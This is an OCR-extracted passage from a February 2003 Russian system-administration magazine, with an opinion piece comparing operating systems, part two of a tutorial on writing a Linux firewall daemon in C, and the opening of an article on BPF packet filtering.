факт, что вообще заставить рабо-
тать такую дикую помесь 16-ти и
32-ух разрядного кода нужно су-
меть (сделанную в конечном ито-
ге для пользователя – совмести-
мость со своими программами по-
чему-то всем хочется увидеть и в
новой версии операционной систе-
мы). Но тут вступает в силу упрёк:
всё бы неплохо, но вот заставлять
людей платить за такой «програм-
мистский опус» не есть хорошо…

Посягательство третье: в
Windows очень много багов (оши-
бок)…

Опровержение: да, много. Особен-
но если пользоваться Windows 95,
который более даже не поддержи-
вается. В любом программном
№2(3), февраль 2003
обеспечении есть ошибки! Более
того, их количество прямо пропор-
ционально количеству предостав-
ляемых возможностей. Что точно
можно поставить в вину Microsoft,
так это сырость первых продуктов.
Но если учесть, что задача была
быстро завоевать рынок, и что
пользователям нужно было пока-
зать как можно больше возможно-
стей, то такую стратегию понять
можно. Смею заметить, что ста-
бильность последних продуктов
увеличивается, а «сырость» кода
уменьшается.

Посягательство четвёртое: поче-
му в Windows я не могу сделать
всего того, что я захочу?!

Опровержение: вообще Windows
не даёт (и не должна) полного до-
ступа пользователю ко всему (во-
обще наиболее полный доступ ко
всему можно получить, лишь имея
под рукой исходный код програм-
мы – тут уже прямая дорога в *nix-
системы). Простой домохозяйке не
нужно давать возможность всё
уничтожить одним действием.
Ещё подобные претензии можно
услышать к Windows как к серверной
платформе. Здесь внимание на созда-
ние: изначально была задача просто-
го и понятного доступа, а также при-
ятной работы пользователя. Тут уж,
пардон, действует правило: безопас-
ность системы обратно пропорцио-
нальна её удобству. И несмотря на
это, Microsoft делает многое для уве-
личения безопасности. Это отмечает-
ся и командами, специализированно
занимающимися безопасностью этой
ОС; кроме того, на момент написания
этих строк Билл Гейтс провозгласил
высокий приоритет безопасности для
всей компании. Последний «клич»
такого толка привёл к тому, что до-
минирование Netscape на рынке бра-
узеров было не то чтобы потеснено,
а скорее даже просто разгромлено в
пух и прах. Возникновения этого «кли-
ча» именно сейчас вполне можно обо-
сновать тремя аргументами:

В своей книге «Дорога в будущее»
Билл Гейтс и не скрывает ни от
кого, что безопасность стоит дале-
ко не на первом месте в предос-
тавлении продукта пользовате-
администрирование
лям. Самое главное – это показать
пользователю возможности, а уже
потом устранять все ошибки. И
только потом доводить безопас-
ность до нормального уровня. С
точки зрения рынка такую техно-
логию можно назвать более чем
правильной: сначала завоевать
нишу, а уже потом делать продукт
нормальным. Оставим в стороне
этическую сторону данного вопро-
са, ибо, как говорится в известной
поговорке: «Любовь приходит и
уходит, а кушать хочется всегда».

Второй аргумент: сказать, что бро-
дить по Интернету с помощью ус-
тановленных по умолчанию версий
InternetExplorer & OutlookExpress
весьма опасно – равнозначно
тому, что просто тихо промолчать.

Плюс ко всему третий аргумент
появляется: конкуренты жить ме-
шают. Тут уж всё просто: хочешь
жить – умей вертеться! Так ведь
из-за всей шумихи пользователи
к конкуренту перебежать могут…
Ну, с Windows хватит. Пожалуй,
следует перейти к тому, что столь ча-
сто позиционируется как реальная
конкуренция – ОС Linux. Тут всё не-
сколько забавнее, поскольку проект
Linux относительно молод, и его
пользователи весьма разношёрстны.
GNU/Linux OS
И самое тут весёлое, с моей скром-
ной точки зрения, – это то, что Linux
позиционируется как вполне полно-
ценная альтернатива продукции от
Microsoft. Наиболее часто в подобных
утверждениях фигурирует дистрибу-
тив Linux Mandrake… Ну что ж… на
вкус и цвет, как говорится, товарищей
поискать надо, но когда «беспристра-
стные» пользователи-журналисты
начинают утверждать, что вышеобоз-
наченный набор пакетов (да простят
меня его поклонники, но не нахожу я
лучших слов для того, что занимает
ненормально большое количество
места на винчестере, в оперативной
памяти, ну и времени процессора в
придачу; хотя я точно знаю, что мож-
но сделать то же самое с меньшими
потерями для компьютера) ставится
и работает лучше, быстрее и понят-
нее, чем Windows XP, то остаётся
только пожать плечами со словами из
49
 администрирование
одного моего любимого литературно-
го произведения: «Пишите? Ну-ну…».
К тому же мало кого, видимо, сму-
щают следующие маленькие факти-
ки:

Приблизительно каждые полгода
с упрямостью, достойной лучше-
го применения, заявляется о том,
что уж теперь-то точно Linux го-
тов для замены ОС Windows на
десктопах конечных пользовате-
лей (обычно такие лозунги под
анонсами KDE – графической обо-
лочки, с сомнительными пользова-
тельскими качествами).

Всё время кричится о том, что ОС
Linux – самая что ни на есть ста-
бильная, безопасная операцион-
ная система… Но где же эти рупо-
ры, когда в лучшие месяцы «уро-
жая» можно свой Linux-сервер
«патчить» и «апгрейдить» до по-
тери пульса… (для затравки: серия
ядер 2.4.x до десятого-одиннадца-
того точно; sendmail, который с тем
же самым упрямством до сих пор
живёт по умолчанию на львиной
доле распространенных дистрибу-
тивов, и многое-многое другое).

Очень многие почему-то любят за-
являть, что программы с открыты-
ми исходниками по определению
значительно хуже коммерческих
лишь потому, что фирмы обычно
не склонны делиться своими нара-
ботками. И, естественно, ПО от
Microsoft в подобных заявлениях
выступает как ярчайший пример…
Почему же столь многим кажется,
что Билл Гейтс – бездарный руко-
водитель, программист и бизнес-
мен? Ещё огромное количество
вопросов «почему?» зависают в
воздухе и, похоже, не найдут от-
вета в ближайшее время.
С позволения читателя останов-
люсь более подробно на ранее напи-
санном «обзывании» Linux Mandrake.
Возможно, что после этой фразы у
меня появилось много новых «дру-
зей», но извините – что вижу, то и пою.
Займёмся конкретикой: на данный
момент минимальные системные тре-
бования для Linux Mandrake 8.1 сле-
дующие: процессор – Intel Pentium
233; память – от 64 Mb; HDD – 1.5 Gb
(по информации с www.linuxcenter.ru).
На седьмой ветке это были минималь-
50
ные требования – испытано на моём
многострадальном компьютере. В
этот самый момент мне вспоминают-
ся заверения ветеранов Linux о том,
что Linux будет себя весьма уверенно
чувствовать на компьютере с 133 MHz,
12 Mb оперативной памяти, объём
винчестера, необходимый для рабо-
ты, заявлялся равным 150 Mb. Далее
воспользуюсь рекламным слогом: но
после того как я попробовал Linux
Mandrake, я понял, что до этого в моей
жизни не было ничего подобного! Кро-
ме того что я получил это бинарное
творение сегодня по рекордно низкой
цене и без всяких лицензионных про-
блем, я обнаружил, что также в комп-
лекте получаю большую кучу проблем
не только с тем, что было вроде как
нормально для *nix систем ранее (ло-
гичность, стабильность системы), но
и с тем, что я должен был получить за
то, что мой (не самый старый) ком-
пьютер чувствует себя не очень важ-
но – удобство, комфорт и реальную
замену Windows.
Из чистого интереса решил я со-
брать свой дистрибутив Linux (да-
да… знаю старую шутку о том, что
количество дистрибутивов Linux уже
превысило количество его пользова-
телей, но ведь на то он и Linux?) У
меня сразу было несколько задач и ог-
раничений: небольшой винчестер на
120 Mb, процессор на 200 MHz, 12 Mb
оперативной памяти, ну и задача:
сделать нормальный серверный ди-
стрибутив. Мне было достаточно
того, что система грузилась и имела
на себе также компилятор и веб-сер-
вер… Кому интересно, могу сказать,
что всё это уместилось менее чем в
половину объема винчестера. Чув-
ствовала себя машина просто пре-
восходно. Выводы делайте сами.
Последний аспект работы с ОС
Linux: безопасность и работа в каче-
стве сервера. Здесь всё чертовски
интересно. С точки зрения теории,
Linux – это сетевая операционная си-
стема, поскольку является одной из
вариаций на тему *nix-систем (а не
наоборот, как я встретил в книге по
Linux RedHat 6.2 c диском Linux
RedHat Cyrillic Edition 6.2), а посему на
этом фронте всё должно быть спокой-
но. Но это – если руководствоваться
чистой логикой и рассматривать тео-
рию. Примемся за рассмотрение
практики: какая модель разработки
большинства «свободных» (FSF) про-
грамм? Правильно! Базар! Посему
никакой упорядоченности и логики
здесь искать не стоит. Но это идеоло-
гия; практика же такова, что на сер-
вер эту операционную систему поста-
вить, конечно же, можно (равно как и
DOS), но вот то, что придётся с ней
повозиться, – это точно. В современ-
ном «дистрибутивостроении» пытают-
ся сделать «Linux с человеческим ли-
цом». Результат – ядра с ошибками в
сетевой подсистеме, возможность
получить права root («суперпользова-
тель» системы, которому система по-
зволяет делать всё), возможность ус-
троить DoS (Denial of Access) атаку –
всё это на уровне ядра и не требует
особых знаний со стороны атакующе-
го. Список этих проблем постоянно
пополняется… Это что касаемо ядра.
В дистрибутивы также любят встраи-
вать программы типа sendmail, тради-
ционно небезопасные. Кто бы мне
ещё объяснил: зачем по умолчанию
запускать практически все возмож-
ные сервисы?
Unix FreeBSD
Буду откровенен с читателем: эта си-
стема – моя любовь. Эти чувства она
снискала себе за очень многое. По-
жалуй, что я определил бы её как одну
из немногочисленных *nix-систем, со-
хранивших зыбкий баланс современ-
ности и классической логичности.
Однако обратимся к фактам.
В большинстве своём эта система
используется для серверных реше-
ний. Также имеет свою популярность
у программистов, и в качестве третьей
категории пользователей можно за-
метить людей, перешедших на Unix
FreeBSD с Linux, когда надоедает бар-
дак с дистрибутивами, проблемы с
пакетами и иногда просто с логикой
построения системы. Однако почему
так происходит?
На серверы FreeBSD зачастую по-
падает по одной простой причине.
Система не стремится быть супер по-
пулярной и следовать всем новомод-
ным явлениям, вместо этого основ-
ным для разработчиков является ста-
бильность и логика работы. Unix
FreeBSD не столь требовательно к
железу как Linux, хотя имеет практи-
чески всё тот же «ассортимент» про-

граммного обеспечения. Ну и кроме
того, команда разработчиков, видимо,
проповедует принцип безопасности
прямо «из коробки», то есть большин-
ство никому не нужных сервисов про-
сто отключено; всё, что есть, установ-
лено с вполне приемлемыми для сер-
вера опциями.
Программистам эта система мо-
жет понравиться уже хотя бы и тем,
что с самого момента установки в
системе ставится компилятор, как
одна из опций есть установка пол-
ного набора исходных текстов с
весьма логичным и понятным уст-
ройством каталогов. И нет никаких
проблем с документацией. В боль-
шинстве случаев вся документация
весьма чётко синхронизирована с
бинарными продуктами.
Ну а кому надоел Linux, эта плат-
форма может нравиться тем, что всё
находится, как было сказано на одном
из форумов www.linux.org.ru, «под од-
ной крышей». Весьма чёткая структу-
рированность системы, достаточно
простой апгрейд системы.
Стоит ещё описать фирменные
«фичи» системы, к каковым относят-
ся система портов и возможность эму-
лировать Linux.
Физически порты – это каталог
/usr/ports, в котором весьма красиво
разложен своеобразный индекс про-
граммного обеспечения, портирован-
ного под Unix FreeBSD и не включён-
ного в основную установку. Причём
установка любой необходимой про-
граммы при наличии подключения к
сети производится парой команд:
# cd /usr/ports/{NameOfSection}/
{ProgramName}
# make install; make clean
Первую строку удобнее будет рас-
смотреть на примере – нам нужно по-
ставить эмулятор Windows – WINE.
Тогда серия команд весьма проста:
# cd /usr/ports/emulators/wine
# make install; make clean
Для тех, у кого нет возможности
качать все необходимые исходники (а
именно из них всё и собирается для
конкретной системы), существуют
уже скомпилированные пакеты наибо-
лее популярных и нужных программ
(обычно расположены на диске в ка-
№2(3), февраль 2003
талоге /cdrom/packages, если CD-ROM
смонтирован в соответствующем ка-
талоге).
Эмуляция Linux – это несколько
каталогов портов (или соответствен-
но несколько пакетов), позволяющие
запускать программы для Linux с не-
доступными исходными текстами под
Unix FreeBSD, так, например, работа-
ют VMWare, Adobe AcrobatReader и
многое другое.
Теперь о менее приятном, но том,
что есть в любой системе: недостатки.
Минусы следующие: у системы не
очень много разработчиков, пользо-
вателей и того, без чего не выживет
ни один проект – инвесторов. Посему
в FreeBSD реализовано может быть
не всё, что хотелось бы. Нечем осо-
бенно сильно хвастаться и в области
поддержки железа (не то чтобы драй-
веров было мало, но в том же Linux
их всё же больше). В минус можно
зачислить и не особенную понятность
системы новичку – сложновато на-
звать её дружелюбной, напичканной
всевозможными мастерами, – скорее
уж системой, чётко подчинённой ло-
гике и поддерживающей старинные
традиции *nix-систем (впрочем, не в
ущерб прогрессу).
Существуют, несомненно, и ошиб-
ки в самой системе, существуют и не-
достатки, которые можно, конечно,
исправить, но всё же оставляют не-
которое не особо приятное впечатле-
ние (например, Unix FreeBSD 4.4 име-
ла, видимо, не особо оттестирован-
ный FAT32 filesystem драйвер, а пото-
му «куролесила» при записи на эти
разделы, или необходимость установ-
ки порта для чтения русских имён на
CD-ROM диске, последнее, впрочем,
обещают точно исправить в 5-ой вет-
ке).
Ну, с FreeBSD всё, но у нас есть и
другие системы…
… and others (QNX, OS/2,
BeOS)
Не оставим без внимания и других слав-
ных представителей ОСологии – OS/2,
BeOS и QNX. Интересны они многим,
и, несомненно, имеют своих поклонни-
ков и противников. У каждой из них есть
какая-то своя характерная черта и что-
то революционно новое, привнесенное
этой операционной системой. Впрочем,
поподробнее о каждой.
администрирование
OS/2 – это детище IBM, которая
решила в своё время попасть ещё и
на рынок операционных систем (не
зря, видимо, говорят, что история раз-
вивается по спирали… Неспроста это
рисование пингвинов на улицах горо-
да…). И всё бы с ней было хорошо,
но существует такое понятие, как «по-
явиться раньше времени». По край-
ней мере, именно такой «диагноз» ей
ставят многие. Технически это была
весьма грамотная система, но пользо-
ватели, как это часто бывает, прого-
лосовали кошельком. Результат вы
можете лицезреть на большинстве
десктопов – про «полуось», как её лю-
бовно называют, знают немногие, а
Windows, с которым была конкурен-
ция, стоит у подавляющего большин-
ства.
На данный момент существует до-
статочно «тёплый» клуб почитателей
OS/2 (www.os2.ru, например), дей-
ствительно готовый всегда помочь.
Бесплатная поддержка этой системы
IBM на данный момент уже заверше-
на, что добавляет проблем для конеч-
ных потребителей. Ответ на вопрос
«почему» весьма прост: при попытке
установки «полуоси» на сколь-либо
современный компьютер возникает
действительно большое количество
проблем – в основном по причине про-
блем с драйверами, какими-то на-
стройками и прочим, прочим, прочим.
Однако многие уверяют, что для сла-
беньких машинок (например, 386 про-
цессор, 40 Mhz, 12 Mb RAM & 350 Mb
HDD) это будет просто идеальный ва-
риант.
Сложновато придётся с поиском
программного обеспечения, посколь-
ку пользователей и разработчиков
программного обеспечения для этой
платформы немного, а мало-мальски
последние продукты пишутся про-
граммистами-энтузиастами в боль-
шинстве случаев не без помощи фон-
да свободного программного обеспе-
чения (ничего не имею против такого
пути разработки, но никаких серьёз-
ных продуктов здесь ждать не прихо-
дится).
BeOS – это чадо Be Inc. Основное
освещение прессы и приток пользо-
вателей получило лишь после выхо-
да пятой версии, которая вышла в
двух вариантах – Personal Edition (PE)
и Professional (Pro). Первая версия
51
 администрирование
была свободно доступна для скачива-
ния и принципиальных отличий от
«профессиональной» версии не име-
ла.
С самого начала эта система со-
здавалась с «мультимедийным» укло-
ном (по замыслу создателей, она дол-
жна/могла заменить MacOS, когда
Apple стал искать для него альтерна-
тиву), и вообще не для платформы
x86 (то есть процессоры от Intel, AMD
и прочие клоны этой архитектуры). Но
после того стало понятно, что по боль-
шому счёту их решение по железу
никому не нужно, а попытка скопиро-
вать схему Apple (полный цикл произ-
водства, начиная от железа и закан-
чивая программными продуктами)
дала сбой, то решено было первона-
чально отказаться от производства
железа и сконцентрироваться только
на операционной системе, а впослед-
ствии и принято решение о переносе
BeOS на x86 платформу. Результат
был потрясающим – система завора-
живает сразу… Однако Be Inc. зани-
малась не только этим – также была
попытка продвигать на рынок свои
приставки (BeIA)… Результат весьма
плачевен – полный провал по всем
направлениям. Be Inc. куплена Palm,
на момент написания этих строк судь-
ба исходного кода BeOS ясна оконча-
тельно – код открытию и переводу под
какую-нибудь лицензию свободного/
условно-свободного программного
обеспечения не подлежит.
Впрочем, на этом не стоит зак-
рывать альбом с яркой надписью
BeOS – фанаты своей системы не
собираются так рано и так просто
сдаваться, и реальна реинкарнация
системы как минимум в двух вари-
антах, совместимых, по обещаниям
разработчиков, с прародителем на
уровне исходных кодов.
Про BeOS написано не так уж и
много, но и не очень мало. Описывать,
рекомендовать что-то по этой систе-
ме – занятие весьма своеобразное,
52
поскольку разрушает смысл весьма
легко применяемого к этой системе
словосочетания – интуитивно понят-
ный интерфейс… Впрочем, кому это не
по душе – командная строка в виде
bash к вашим услугам. С программным
обеспечением тут всё неплохо (пример
тому – огромный набор программ на
www.bebits.com и www.bebits.ru). Есть
за что похвалить систему по работе
с железом (PentuimII-350 Mhz, 128 Mb
RAM и 6 Gb HDD – полёт, в прямом
смысле этого слова, нормальный).
Много интересных инженерных и ди-
зайнерских идей, мыслей и разрабо-
ток. В отличии от многих других под-
ходит для работы на рабочем столе
пользователя, поскольк у имеет
офис (от GOBE), совместимый с
Microsoft Office по форматам доку-
ментов, а также IRC и ICQ клиентов,
веб-браузер (Mozilla и Opera + свой
слабенький, но худо-бедно работа-
ющий NetPositive).
В качестве минусов можно ска-
зать, что программное-то обеспече-
ние есть, но вот оно или денег сто-
ит, или не совсем устойчиво в рабо-
те… Да и драйвера всё же неидеаль-
ны, и есть не на всё железо (хотя у
меня на это нареканий не было ни-
каких). Кроме того, слабо мне, чес-
тно говоря, верится в судьбу столь
большого проекта в руках Open-
Source Community… Вывести его на
нормальный уровень работы будет
непросто. Хотя если не стараться, то
уж тем более ничего не получится.
QNX… Сложно точно сказать, как
эта система попала сюда. Ведь пред-
назначается она не совсем для деск-
топ-использования. Причина тому
проста – из всего обзора это един-
ственная система реального времени,
основанная на микроядре и предназ-
наченная (в теории) для промышлен-
ных решений на базе x86 процессо-
ра.
Популярность к ней пришла после
шага, аналогичного Be Inc. – шестую
версию можно получить из Интерне-
та вполне бесплатно для персональ-
ного изучения и некоммерческой раз-
работки программ.
Система весьма интересна по кон-
цепциям, в неё заложенным, но основ-
ной круг её пользователей – это про-
фессионалы своего дела, реально
понимающие, зачем им это надо. По-
пасть на десктопы у этой системы
есть все шансы, но, возможно, в бу-
дущем… Сейчас это просто та систе-
ма, о которой нужно знать, поскольку
у неё есть реальные шансы оказать-
ся полезной как на сервере (в этом
качестве её можно использовать уже
сейчас), так и на рабочем столе обыч-
ного пользователя.
Этот раздел можно продолжать до
бесконечности, поскольку количество
операционных систем сейчас весьма
велико (например, это AtheOS,
MenuetOS и многие другие интерес-
ные системы), но, к сожалению ли, к
счастью ли, пригодны для использо-
вания немногие из них и, я надеюсь,
что в этом обзоре они нашли наибо-
лее полное отражение.
Итого
Сложно подводить «итого» в такой
статье. Наверное, кто-то будет ждать
от меня выводы о том, какой же опе-
рационной системой пользоваться,
кто-то может ждать от меня очеред-
ного проявления «нестандартной ори-
ентации» в этом сложном информа-
ционном мире, кто-то может ждать от
меня чего-то ещё… Я же скажу про-
сто: в этом «творении» мне хотелось
кому-то открыть глаза на происходя-
щее, кого-то утвердить в мысли, что
он прав…
И закончить эту статью хочется
так, как заканчивали свою речь рим-
ские консулы, передавая власть сво-
им преемникам: “Feci, quod potui,
faciant meloira potentes”, или по-про-
стому: «Сделал что мог, и пусть кто
может, сделает лучше».
 программирование

БРАНДМАУЭР Часть 2

В первой части статьи мы начали изучение одного из вариантов

построения брандмауэра, рассмотрели структуру его основной
составляющей – модуля ядра, а также получили навыки внесения
изменений в ядро операционной системы Linux.
В этой части мы рассмотрим две оставшиеся составные
брандмауэра – процесс-демон и программу инициализации и
запуска процесса-демона.

ВЛАДИМИР МЕШКОВ
54
 программирование
Задача программы инициализации и запуска процесса
демона – принять исходные данные (правила фильтра-
ции) и запустить на выполнение процесс-демон, пере-
дав ему эти правила. В нашем примере правилами филь-
трации является IP-адрес хоста, чьи пакеты мы будем
блокировать.
Процесс-демон после активизации передает модулю
ядра правила фильтрации и в дальнейшем занимается
ведением log-файла, в котором фиксируется время за-
пуска/останова демона и попытки доступа с запрещен-
ного адреса.
Теперь давайте детально рассмотрим каждую состав-
ляющую.

Программа
инициализации и запуска
процесса-демона
Нижеприведенный программный код разместим в файле
sfc.c. Здесь будет находиться главная функция main().
Рассмотрение программы начнем с определения за-
головочных файлов и переменных.
Нам понадобятся следующие header-файлы:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include "sfc.h"

В файле sfc.h определено имя файла, в котором хра-

нится идентификатор процесса-демона (PID-файл). Файл
имеет следующее содержание:

#define PID "daemon.pid"

Идентификатор процесса-демона определим как гло-

бальную переменную:

static pid_t pid;

А теперь распишем главную функцию main().

int main (int argc, char *argv[])

{
void usage():

Это прототип функции для обработки неправильного

ввода параметров. Данная функция имеет следующий вид:

void usage()
{
fprintf(stderr,"\nUsage: daemon [ start / stop ]\n\n");
return;
}

Программа при запуске принимает один параметр,

определяющий режим ее работы:

start – запустить процесс-демон на выполнение;

stop – завершить выполнение процесса-демона.

Для работы нам понадобятся переменные:

№2(3), февраль 2003 55

 программирование

int pid_file – дескриптор файла для хранения иденти- Режим остановки выполнения процесса-демона
фикатора демона;

struct stat s – структура для хранения атрибутов файла. if(!(strcmp(argv[1],"stop"))) {

Проверяем правильность ввода входных параметров: Для остановки процесса-демона необходимо получить
значение его идентификатора.
if(argc!=2) { Это значение извлекаем из PID-файла:
usage();
return (-1); pid_file=open(PID,O_RDONLY);
} if(pid_file<0) {
perror(PID);
return (-1);
Если входной параметр указан, определяем, какой }
режим работы задан. Их, как мы уже сказали, два.
if(read(pid_file,(char *)&pid,sizeof(pid_t)) < 0) {
perror(PID);
Режим запуска процесса-демона на выполнение return (-1);
}

if(!(strcmp(argv[1],"start"))) { close(pid_file);

Во избежание повторного запуска проверяем наличие PID-файл нам больше не нужен, удаляем его:
в текущем каталоге PID-файла. Если файл присутствует,
то демон уже запущен, о чем пользователь получает уве- if(unlink(PID) < 0) {
домление: perror(PID);
return (-1);
}
if(stat(PID,&s)==0) {
fprintf(stderr,"\nDaemon is allready running !\n\n"); Теперь останавливаем процесс-демон, послав ему сиг-
return (-1);
} нал SIGINT:

Инициализируем демон: kill(pid,SIGINT);

}

init_daemon(); На этом функция main() завершается:

Функция инициализации будет определена ниже. return (0);

}
Демон запустим как дочерний процесс.

pid = fork();
if (pid < 0) {
Процесс-демон
perror("fork"); Весь код, отвечающий за запуск, функционирование и
exit(1); остановку процесса-демона, разместим в файле
}
sf_daemon.c. По сути, этот файл будет представлять со-
if (pid==0) { бой набор функций.

Отсоединяемся от терминала: Заголовочные файлы и переменные

Вначале, как всегда, определимся с заголовочными фай-
setsid(); лами и переменными. Нам понадобятся:

Стартуем демон: #include <stdio.h>

#include <stdlib.h>
#include <fcntl.h>
start_daemon(); #include <time.h>
exit(1); #include <signal.h>
} #include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
Родительский процесс создает PID-файл и записыва- #include <linux/in.h>
ет в него идентификатор процесса-демона: #include "sf_daemon.h"

Файл sf_daemon.h имеет следующее содержание:

pid_file=open(PID,O_CREAT|O_TRUNC|O_RDWR,0644);
if(pid_file < 0) {
perror(PID); #include <linux/types.h>
return (-1); #include <linux/ip.h>
}
if(write(pid_file,(char *)&pid,sizeof(pid_t)) < 0) { Имя log-файла:
perror(PID);
return (-1);
} #define LOG "/var/log/daemon"
close(pid_file);
} struct data_log {

56
 программирование
__u32 addr; Если установлен флаг готовности данных для считы-
int action; вания и поступил пакет с запрещенного адреса, фиксиру-
int ready;
}; ем это событие в log-файле:
if(data.ready==1) {
В этом файле определено имя log-файла и структура if(data.action==0) {
data_log, в которой хранятся данные для заполнения log-
if(fill_log(f,data.action,data.addr) < 0)
файла. Назначение полей структуры следующее: stop_daemon();

__u32 – IP-адрес хоста (в сетевом формате), от кото-
}
рого поступил пакет; }

int action – выполняемое действие (1 – разрешить про- }
}
хождение пакета, 0 – отбросить пакет);

int ready – флаг готовности данных в устройстве для Заполнением log-файла ведает функция fill_log, к ней
считывания. мы еще вернемся.
Теперь подошла очередь функции инициализации.
Поскольку наш демон работает с двумя файлами (файл Напомню, что ее задача – передать модулю ядра правила
устройства /dev/firewall и log-файл), то необходимо опре- фильтрации (т.е. IP-адрес).
делить две переменные для хранения дескрипторов этих
файлов: void init_daemon()
{

int fddev=0; - äåñêðèïòîð ôàéëà óñòðîéñòâà; int err;

int f; - äåñêðèïòîð log-ôàéëà. struct iphdr ip_pack;

В структуре ip_pack, в поле saddr (адрес источника),

Функции будет находится запрещенный IP-адрес.
Первая функция, которую мы рассмотрим, останавлива- Обнулим эту структуру:
ет выполнение процесса-демона. Вот что она из себя пред-
ставляет: memset(&ip_pack,0,sizeof(struct iphdr));

void stop_daemon() и заполним поле адреса источника:

{
close(fddev);
stop_log(f);
exit(0);
}
Функция закрывает устройство, завершает ведение
log-файла и осуществляет выход из программы.
Следующую функцию можно назвать центральной ча-
стью процесса-демона. Эта функция осуществляет непос-
редственный обмен данными с модулем ядра и заполня-
ет log-файл. Главной особенностью данной функции яв-
ляется выполнение в бесконечном цикле, который преры-
вается только при поступлении сигнала SIGINT.
ip_pack.saddr=inet_addr("192.168.1.10");
Подготовим к работе log-файл. Если log-файл отсут-
ствует, создаем его:
f=open(LOG,O_CREAT|O_APPEND|O_RDWR,0644);
if(f<0) {
perror(«open log»);
exit(0);
}
Теперь передадим модулю правила фильтрации. От-
крываем устройство в режиме чтения/записи:

void packet_loop(void) fddev=open("/dev/firewall",O_RDWR);

{ if(fddev<0) {
perror("firewall");
Структура для информационного обмена с модулем: exit(0);
}

struct data_log data; Записываем в него структуру ip_pack:

Размер блока данных, считанного из модуля: err=write(fddev,&ip_pack,sizeof(struct iphdr));

if(err<0) {
perror("firewall");
int count; stop_daemon();
}

Запускаем цикл: Итак, IP-пакеты, поступившие с хоста с адресом

192.168.1.10, будут заблокированы на входе нашей сис-
for (;;) { темы.
Выходим из функции:
Считываем из модуля данные, в случае ошибки завер-
шаем выполнение: return;
}
count=read(fddev,(char *)&data,sizeof(struct data_log));
if(count<0) stop_daemon(); Если вам не понравилось, что IP-адрес введен не-

№2(3), февраль 2003 57

 программирование
посредственно в исходный текст, то можете усовершен- Функция start_log
ствовать код, считывая адрес из файла или из командной
строки. int start_log(int f)
{
Теперь рассмотрим функцию, которая осуществляет char buf[BSIZE];
запуск демона на выполнение. time_t start_t;
Обнулим буфер и получим текущее время:
void start_daemon()
{ bzero(buf,BSIZE);
time(&start_t);
Демон должен реагировать только на один сигнал –
SIGINT. При получении этого сигнала демон завершает Формируем буфер и записываем его в log-файл:
выполнение. Все остальные сигналы необходимо забло- sprintf(buf,"Daemon started at %s", ctime(&start_t));
кировать. if(write(f,buf,strlen(buf)) < 0) return (-1);
Определим переменные: return (0);
}
sigset_t mask;
static struct sigaction act;
Функция stop_log
Создадим полный набор сигналов, исключив из него Функции start_log и stop_log практически не отличаются
SIGINT: друг от друга, кроме имен переменных, поэтому привожу
код без комментариев:
sigfillset(&mask);
sigdelset(&mask,SIGINT);
int stop_log(int f)
{
Блокируем все сигналы: char buf[BSIZE];
time_t stop_t;
sigprocmask(SIG_SETMASK,&mask,NULL); bzero(buf,BSIZE);
time(&stop_t);
sprintf(buf,»Daemon stoped at %s», ctime(&stop_t));
Определяем новый обработчик для SIGINT: if(write(f,buf,strlen(buf)) < 0) return (-1);
close(f);
act.sa_handler=stop_daemon; return (0);
sigaction(SIGINT,&act,NULL); }

А теперь стартуем:
start_log(f);
Функция fill_log
packet_loop(); Эта функция, кроме дескриптора log-файла, принимает
exit(1); IP-адрес пакета, который был заблокирован (u_long addr),
}
и идентификатор выполненного действия (int action). Фун-
кция очень простая, и необходимости в комментариях я
LOG-файл не вижу.
Нам осталось рассмотреть функции для ведения log-фай- int fill_log(int f, int action, u_long addr)
ла. Их три: {

start_log – запись о начале выполнения процесса-де- char buf[BSIZE];
time_t fill_t;
мона;

fill_log – запись информации о блокировании IP-пакета; bzero(buf,BSIZE);
time(&fill_t);

stop_log – запись об остановке выполнения процесса-
демона. if(action==0) {
sprintf(buf,"Packet from %s was rejected at
%s",inet_ntoa(addr), ctime(&fill_t));
Каждая из этих функций фиксирует текущее время if (write(f,buf,strlen(buf)) < 0)
return (-1);
возникновения того или иного события. return (0);
Все три функции разместим в файле sf_log.c. }
}

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
Makefile
#include <fcntl.h> Для сборки исполняемого модуля создадим Makefile сле-
#include <time.h> дующего содержания:
#include <sys/socket.h>
#include <linux/in.h>
#define BSIZE 80 CC = gcc
name = daemon
DAEMON = sfc.o sf_daemon.o sf_log.o
Все функции принимают в качестве аргумента деск-
$(name): $(DAEMON)
риптор log-файла, в который будет осуществляться запись $(CC) -g -o $(name) $(DAEMON)
информации. В случае удачного завершения операции все sfc.o: sfc.c
$(CC) -c sfc.c
функции возвращают 0, в случае ошибки -1. sf_daemon.o: sf_daemon.c

58
 программирование
$(CC) -c sf_daemon.c рузить модуль ядра.
sf_log.o: sf_log.c После запуска демона в текущем каталоге появится
$(CC) -c sf_log.c
файл daemon.pid. Не удаляйте этот файл! В нем хранится
clean: идентификатор процесса-демона для возможности его
rm -f *.o
корректной остановки. Для остановки выполнения процес-
Здесь все должно быть вам знакомо. Ключ «-g» при са-демона введите команду:
успешной сборке можно будет заменить на «-s».
./daemon stop
Запуск и остановка выполнения
процесса-демона Файл daemon.pid автоматически удаляется.
После сборки в текущем каталоге появится исполняемый Информация о времени запуска и останова процесса-
файл daemon. Для его запуска наберите команду: демона, а также о заблокированных пакетах будет зафик-
сирована в файле /var/log/daemon.
./daemon start При подготовке статьи были использованы исходные
тексты и документация брандмауэра SINUS (http://
Перед запуском процесса-демона необходимо заг- www.ifi.unizh.ch).

№2(3), февраль 2003 59

 программирование
ПАКЕТНЫЙ ФИЛЬТР
Если вы используете сетевой анализатор с выводом информации на консоль, то одна из проблем,
с которой вы столкнетесь, заключается в том, что анализатор не будет успевать отображать все
данные, поступившие из сети, и часть пакетов будет для вас потеряна.
Это особенно актуально, если трафик очень плотный. Вто-
рая проблема – вас могут интересовать только пакеты,
адресованные выделенным хостам, а не все подряд. Ре-
шение заключается в фильтрации входящих сетевых па-
кетов по какому-либо определенному признаку, например
по адресной части. Одним из вариантов решения являет-
ся использование оператора условия if, однако данное ре-
шение неэффективно. В этом случае ядру приходится вы-
таскивать полный пакет из сети, на что отнимается про-
цессорное время, затем анализатор вынужден «экзаме-
новать» заголовок каждого пакета перед принятием ре-
шения – отображать данные или нет. Оптимальным явля-
ется решение отсеять лишние пакеты как можно раньше,
на уровне драйвера сетевой карты. Ядро Linux позволяет
сделать это при помощи пакетного фильтра.
Описание языка BPF
Пакетный фильтр представляет собой последователь-
